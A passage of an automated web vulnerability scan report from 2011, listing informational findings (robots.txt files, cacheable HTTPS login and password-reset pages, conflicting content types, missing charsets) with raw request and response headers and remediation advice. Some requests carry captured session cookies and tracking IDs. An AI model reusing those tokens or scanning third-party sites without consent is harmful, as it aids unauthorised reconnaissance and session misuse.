Confidence:	Certain
Host:	http://www.signonsandiego.com
Path:	/news/blogs/science-quest/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.signonsandiego.com

Response

HTTP/1.1 200 OK
Expires: Sun, 30 Jan 2011 03:19:00 GMT
ETag: "5e0bd1c281a62a380d7a948085bfe2d1"
Cache-Control: max-age=60
Last-Modified: Sun, 30 Jan 2011 03:18:00 GMT
Content-Type: text/plain
Server: Apache/2.2.10
Content-Length: 23
Date: Sun, 30 Jan 2011 03:19:09 GMT
X-Varnish: 554926183 554925798
Age: 21
Via: 1.1 varnish
Connection: close

User-agent: *
Allow: /

29.118. http://www.six-telekurs.com/tkfich_index/tkfich_home.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.six-telekurs.com
Path:	/tkfich_index/tkfich_home.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.six-telekurs.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:22 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m PHP/5.2.13 mod_perl/2.0.4 Perl/v5.8.8
Content-Type: text/plain
Last-Modified: Fri, 18 Nov 2005 06:42:11 GMT
ETag: "d9933412-01010000"
Content-Length: 238
Connection: close

# http://www.telekurs.com/robots.txt
# http://www.telekurs-financial.com/robots.txt
# http://www.telekurs-multipay.com/robots.txt
# http://www.telekurs-services.com/robots.txt
# http://www.sic.ch/
...[SNIP]...

29.119. http://www.spacedaily.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.spacedaily.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.spacedaily.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 06:32:42 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Sun, 15 Jun 2008 12:03:11 GMT
ETag: "10440ba-56-4b7bfdc0"
Accept-Ranges: bytes
Content-Length: 86
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /index.html
Allow: /reports
Allow: /pageone
Allow: /
Allow: /news

29.120. http://www.spacepolitics.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.spacepolitics.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.spacepolitics.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:11 GMT
Server: Apache
X-Pingback: http://www.spacepolitics.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.redacted\|msn.com/wonderwall\|v14.msn.com/\|preview.redacted/\|www.redacted/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stylemepretty.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:27 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 29 Sep 2009 16:28:42 GMT
ETag: "2a30640-1d0-474b9e84d6280"
Accept-Ranges: bytes
Content-Length: 464
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/cache
Disallow: /wp-content/themes
Disallow: /trackback
Disallow: /comme
...[SNIP]...

29.122. http://www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.terra.com
Path:	/$\|www.people.com/$\|http:/www.walmart.com/\|http:/www.walmart.com/cp/toys/4171\|http:/www.walmart.com/cp/Electronics/3944

Request

GET /robots.txt HTTP/1.0
Host: www.theshophound.typepad.com

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web006
X-Webserver: oak-tp-web006
Vary: cookie
Keep-Alive: timeout=300, max=100
Content-Type: text/plain; charset=utf-8
Content-Length: 341
Date: Sun, 30 Jan 2011 02:03:44 GMT
X-Varnish: 2958161737 2941127374
Age: 16549
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /t/trackback
Disallow: /t/comments
Disallow: /t/stats
Disallow: /t/app
Disallow: /.m/

User-agent: Googlebot-Mobile
Disallow: /
Allow: /.m/

User-agent: Y!J-SRD
Disallow: /
All
...[SNIP]...

29.125. http://www.ticketcity.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ticketcity.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ticketcity.com

Response

HTTP/1.1 200 OK
Content-Length: 93
Content-Type: text/plain
Last-Modified: Thu, 22 Jul 2010 14:19:57 GMT
Accept-Ranges: bytes
ETag: "f5bda4f6a829cb1:1713"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:03:48 GMT
Connection: close

User-agent: *
Disallow: /goto.aspx

Sitemap: http://www.ticketcity.com/tcsitemap_index.xml

29.126. http://www.tigerdirect.com/applications/SearchTools/item-details.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tigerdirect.com
Path:	/applications/SearchTools/item-details.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tigerdirect.com

Response

HTTP/1.0 200 OK
Content-Length: 112
Content-Type: text/plain
Last-Modified: Fri, 24 Jul 2009 20:02:38 GMT
Accept-Ranges: bytes
ETag: "a3c6d8b199cca1:7313"
Server: Microsoft-IIS/6.0
X-SV: MIA05B
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:24:09 GMT
Connection: close

# Allow all

User-agent: *
Disallow: /cgi-bin/
Disallow: /cgisec/
Disallow: /profiles/
Disallow: /email/

29.127. http://www.twitter.com/MAlexJohnson previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.twitter.com
Path:	/MAlexJohnson

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:39 GMT
Server: Apache
Vary: Host,Accept-Encoding
Set-Cookie: k=173.193.214.243.1296357579603072; path=/; expires=Sun, 06-Feb-11 03:19:39 GMT; domain=.twitter.com
Last-Modified: Sat, 29 Jan 2011 02:17:05 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Mon, 31 Jan 2011 03:19:39 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

29.128. http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.walmart.com
Path:	/\|http:/www.walmart.com/cp/toys/4171\|http:/www.walmart.com/cp/Electronics/3944

Request

GET /robots.txt HTTP/1.0
Host: www.webmd.com

Response

HTTP/1.1 200 OK
Content-Length: 134
Content-Type: text/plain
Content-Location: http://www.webmd.com/robots.txt
Last-Modified: Tue, 19 Aug 2008 19:19:28 GMT
Accept-Ranges: bytes
ETag: "060a57f302c91:13b0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:04:07 GMT
Connection: keep-alive

# Robots.txt file WebMD
# Updated: Jan 2007

User-agent: *
Disallow: /404
Disallow: /500
Disallow: /search/search_results/

30. Cacheable HTTPS response previous next
There are 13 instances of this issue:

https://login.silverlight.net/login/createuser.aspx
https://login.silverlight.net/login/forgotpassword.aspx
https://secure.opinionlab.com/ccc01/comment_card.asp
https://secure.opinionlab.com/ccc01/o.asp
https://www.google.com/adsense/support/bin/request.py
https://www.newsvine.com/_action/user/logout
https://www.newsvine.com/_nv/accounts/global/information
https://www.newsvine.com/_nv/accounts/login
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts
https://www.newsvine.com/_nv/accounts/msnbc/newsletters
https://www.newsvine.com/_nv/accounts/register
https://www.newsvine.com/_nv/api/accounts/login
https://www.newsvine.com/_nv/api/accounts/resetPassword

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

30.1. https://login.silverlight.net/login/createuser.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/createuser.aspx

Request

Response

30.2. https://login.silverlight.net/login/forgotpassword.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/forgotpassword.aspx

Request

GET /login/forgotpassword.aspx HTTP/1.1
Host: login.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253AWebForm_DoPostBackWithOptions%252528newWebForm_PostBackOptions%252528%252522ctl00%252524ma%2526oidt%253D2%2526ot%253DSUBMIT; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12239
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Forgot
...[SNIP]...

30.3. https://secure.opinionlab.com/ccc01/comment_card.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.opinionlab.com
Path:	/ccc01/comment_card.asp

Request

GET /ccc01/comment_card.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:21:59 GMT
Connection: close

<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

30.4. https://secure.opinionlab.com/ccc01/o.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.opinionlab.com
Path:	/ccc01/o.asp

Request

GET /ccc01/o.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.5. https://www.google.com/adsense/support/bin/request.py previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.google.com
Path:	/adsense/support/bin/request.py

Request

GET /adsense/support/bin/request.py HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.6. https://www.newsvine.com/_action/user/logout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_action/user/logout

Request

GET /_action/user/logout HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:14:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=6f1155b9ad575142bcd172d5d0a7cfe4; expires=Sat, 25-Jan-2031 03:14:57 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close

30.7. https://www.newsvine.com/_nv/accounts/global/information previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/global/information

Request

GET /_nv/accounts/global/information?affiliate= HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 19:14:00 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=ec5f7b8cd5b4befb3ef83274f58cafb4; expires=Sat, 25-Jan-2031 19:14:00 GMT; path=/; domain=.newsvine.com
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close

30.8. https://www.newsvine.com/_nv/accounts/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/login

Request

GET /_nv/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 19:13:56 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=7b22b47475b54bab17a970fa3de24600; expires=Sat, 25-Jan-2031 19:13:56 GMT; path=/; domain=.newsvine.com
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close

30.9. https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/msnbc/emailAlerts

Request

GET /_nv/accounts/msnbc/emailAlerts HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.10. https://www.newsvine.com/_nv/accounts/msnbc/newsletters previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/msnbc/newsletters

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:14:50 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=02396598600ac73fb37c1186c374650e; expires=Sat, 25-Jan-2031 03:14:50 GMT; path=/; domain=.newsvine.com
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close

30.11. https://www.newsvine.com/_nv/accounts/register previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/register

Request

GET /_nv/accounts/register?referrer=toolbar HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 19:04:17 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3b662defffbb251275e854399fecf5e4; expires=Sat, 25-Jan-2031 19:04:17 GMT; path=/; domain=.newsvine.com
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close

30.12. https://www.newsvine.com/_nv/api/accounts/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/api/accounts/login

Request

GET /_nv/api/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.13. https://www.newsvine.com/_nv/api/accounts/resetPassword previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/api/accounts/resetPassword

Request

GET /_nv/api/accounts/resetPassword HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

31. Multiple content types specified previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bloglines.com
Path:	/js/r200702160/bl/home.js

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Content-Type: application/javascript
text/html; charset=utf-8

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

Response

32. HTML does not specify charset previous next
There are 89 instances of this issue:

http://ad.doubleclick.net/adi/
http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6
http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3
http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5
http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159
http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6
http://ad.doubleclick.net/adi/N4319.msn/B2087123.383
http://ad.doubleclick.net/adi/N4441.microsoftonline/B5073082
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4
http://ad.doubleclick.net/adi/tigerdirect.com/Section_2_House
http://ad.doubleclick.net/clk
http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php
http://amch.questionmarket.com/adscgen/st.php
http://analytics.live.com/Sync.html
http://analytics.microsoft.com/Sync.html
http://analytics.redacted/Include.html
http://analytics.redacted/sync.html
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://context3.kanoodle.com/cgi-bin/context.cgi
http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23
http://ec.redcated/ds/UXULASONYSEL/
http://english.aljazeera.net/_inc/adsrc.html
http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html
http://geo.eyewonder.com/
http://jqueryui.com/about
http://local.redacted/ten-day.aspx
http://local.redacted/weather.aspx
http://redacted/inc/Attributions.asp
http://redacted/inc/Views/Shared/Core/Content/js/utility.js
http://redacted/investor/StockRating/srsmain.asp
http://redacted/investor/home.aspx
http://redacted/investor/market/earncalendar/
http://redacted/investor/market/treasuries.aspx
http://redacted/investor/partsub/funds/etfperformancetracker.aspx
http://redacted/investor/partsub/funds/topfunds.asp
http://redacted/investor/quotewatchlist.asp
http://msn.whitepages.com/
http://mymsn.hotmail.redacted/cgi-bin/mymsn/mymsn.html
http://player.ooyala.com/info/primary/
http://spe.redcated/ds/CJCNTCINGCIN/
http://spe.redcated/ds/CJCNTCINGCP9/
http://spe.redcated/ds/DEDENBARCISA/
http://sstatic.net/Js/third-party/jquery.typewatch.js
http://sstatic.net/Js/third-party/openid-jquery.js
http://sstatic.net/Js/wmd.js
http://sstatic.net/js/master.min.js
http://sstatic.net/js/question.js
http://sstatic.net/openid.css
http://sstatic.net/stackoverflow/all.css
http://sstatic.net/stackoverflow/img/favicon.ico
http://stackoverflow.com/posts/4843433/ivc/3344
http://stackoverflow.com/questions
http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
http://stackoverflow.com/tags
http://stackoverflow.com/users
http://stackoverflow.com/users/login
http://stackoverflow.com/users/login/global/request
http://svtrk.com/vtrk/
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl
http://uac.advertising.com/wrapper/aceUACping.htm
http://redcated/APM/iview/139941180/direct
http://redcated/APM/iview/148848786/direct
http://redcated/BEL/iview/262582811/direct
http://redcated/CNT/iview/286609711/direct
http://redcated/CNT/iview/287065754/direct
http://redcated/CNT/iview/299297287/direct
http://redcated/NYC/iview/264935949/direct
http://redcated/ULA/iview/296652509/direct
http://vms.redacted/vms.aspx
http://webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video
http://wrapper.g.redacted/GRedirect.aspx
http://www.cannex.com/
http://www.co2stats.com/propres.php
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.iaventurepartners.com/InformationArbitrage/bcode.swf
http://www.iaventurepartners.com/LKKpQ/InformationArbitrage/bcode.swf
http://www.json.org/js.html
http://www.json.org/json2.js
http://www.microsoft.com/library/errorpages/searchMetric.html
http://www.msnbc.redacted/html/HtmlSitemap0.html
http://www.spacedaily.com/
http://www.thespacereview.com/
http://www.tigerdirect.com/cgi-bin/icart.asp
http://www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

32.1. http://ad.doubleclick.net/adi/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/

Request

GET /adi/ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html
X-Dclk-Inred-Response-Type: None
Content-Length: 26
Date: Sun, 30 Jan 2011 02:04:39 GMT
Server: GFE/2.0
Connection: close

<html><body></body></html>

32.2. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Request

GET /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=36872389&AN=1895959499&PG=NBCMSN&ASID=88afdf6554cf4226bcbb92e543b579f1&destination=;ord=1895959499? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

32.3. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3382.no_url_specifiedOX2487/B5076164.3

Request

Response

32.4. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3382.no_url_specifiedOX2487/B5076164.5

Request

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

32.5. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.MSN/B5123509.8

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

32.6. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.7

Request

Response

